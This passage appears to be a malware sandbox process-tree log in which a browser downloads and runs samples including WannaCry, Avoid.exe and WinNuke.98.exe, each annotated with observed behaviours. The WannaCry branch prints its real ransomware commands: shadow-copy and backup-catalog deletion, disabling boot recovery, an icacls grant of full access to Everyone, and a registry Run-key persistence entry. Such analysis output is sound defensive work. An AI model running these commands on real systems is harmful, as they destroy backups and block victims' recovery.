  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
  2⤵
  PID:2332
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3
  2⤵
  - Downloads MZ/PE file
  - Suspicious behavior: EnumeratesProcesses
  PID:1180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2656 /prefetch:8
  2⤵
  PID:2688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
  2⤵
  PID:3868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
  2⤵
  PID:3564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4168 /prefetch:1
  2⤵
  PID:2264
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3832 /prefetch:1
  2⤵
  PID:4100
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3424 /prefetch:8
  2⤵
  PID:2328
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3424 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1
  2⤵
  PID:4544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5404 /prefetch:1
  2⤵
  PID:1660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:1
  2⤵
  PID:2952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3556 /prefetch:1
  2⤵
  PID:3532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4112 /prefetch:1
  2⤵
  PID:1744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
  2⤵
  PID:2280
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5692 /prefetch:1
  2⤵
  PID:736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
  2⤵
  PID:3024
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:1
  2⤵
  PID:2944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=2068 /prefetch:8
  2⤵
  PID:4420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:1
  2⤵
  PID:2012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6360 /prefetch:8
  2⤵
  PID:5068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6140 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2520
- C:\Users\Admin\Downloads\WinNuke.98.exe
  "C:\Users\Admin\Downloads\WinNuke.98.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1296
- C:\Users\Admin\Downloads\WinNuke.98.exe
  "C:\Users\Admin\Downloads\WinNuke.98.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1
  2⤵
  PID:2540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6380 /prefetch:8
  2⤵
  PID:4672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5924 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2564
- C:\Users\Admin\Downloads\Avoid.exe
  "C:\Users\Admin\Downloads\Avoid.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  PID:4828
- C:\Users\Admin\Downloads\Avoid.exe
  "C:\Users\Admin\Downloads\Avoid.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  PID:3536
- C:\Users\Admin\Downloads\Avoid.exe
  "C:\Users\Admin\Downloads\Avoid.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  PID:4244
- C:\Users\Admin\Downloads\Avoid.exe
  "C:\Users\Admin\Downloads\Avoid.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  PID:1360
- C:\Users\Admin\Downloads\Avoid.exe
  "C:\Users\Admin\Downloads\Avoid.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  PID:3140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6676 /prefetch:1
  2⤵
  PID:1792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
  2⤵
  PID:4072
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3836 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5696 /prefetch:1
  2⤵
  PID:3156
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6880 /prefetch:8
  2⤵
  PID:3500
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4320 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4300
- C:\Users\Admin\Downloads\WannaCry.EXE
  "C:\Users\Admin\Downloads\WannaCry.EXE"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Sets desktop wallpaper using registry
  - System Location Discovery: System Language Discovery
  PID:2720
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h .
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:2312
- - C:\Windows\SysWOW64\icacls.exe
    icacls . /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:3564
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 41851738434501.bat
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5016
  - - C:\Windows\SysWOW64\cscript.exe
      cscript.exe //nologo m.vbs
      4⤵
      System Location Discovery: System Language Discovery
      PID:3820
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s F:\$RECYCLE
    3⤵
    - Views/modifies file attributes
    PID:4152
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected] co
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:436
  - - C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe
      TaskData\Tor\taskhsvc.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:3640
  - - C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe
      TaskData\Tor\taskhsvc.exe
      4⤵
      PID:3648
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c start /b @[email protected] vs
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3620
  - - C:\Users\Admin\Downloads\@[email protected]
      @[email protected] vs
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:1992
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4908
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1880
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4920
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1204
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Sets desktop wallpaper using registry
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    PID:2012
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "cvzueddzb910" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4056
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "cvzueddzb910" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:2652
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2436
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3624
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:2432
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4832
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:4804
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:3484
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2520
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:2916
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3740
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1788
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:4844
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1912
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2652
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:4504
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5112
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3712
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:2628
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3332
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:4876
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:4580
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4564
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:4792
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:4084
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3804
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1788
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:1380
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3756
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2000
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:3660
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
  2⤵
  PID:456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3648 /prefetch:1
  2⤵
  PID:4880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6648 /prefetch:1
  2⤵
  PID:4536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:1
  2⤵
  PID:2728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3144 /prefetch:1
  2⤵
  PID:1196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7064 /prefetch:8
  2⤵
  PID:3484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5464 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7032 /prefetch:1
  2⤵
  PID:3680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6196 /prefetch:8
  2⤵
  PID:4672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,2175646297157396018,10823668654383539107,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6504 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5108
- C:\Users\Admin\Downloads\000.exe
  "C:\Users\Admin\Downloads\000.exe"
  2⤵
  - Executes dropped EXE
  - Enumerates connected drives
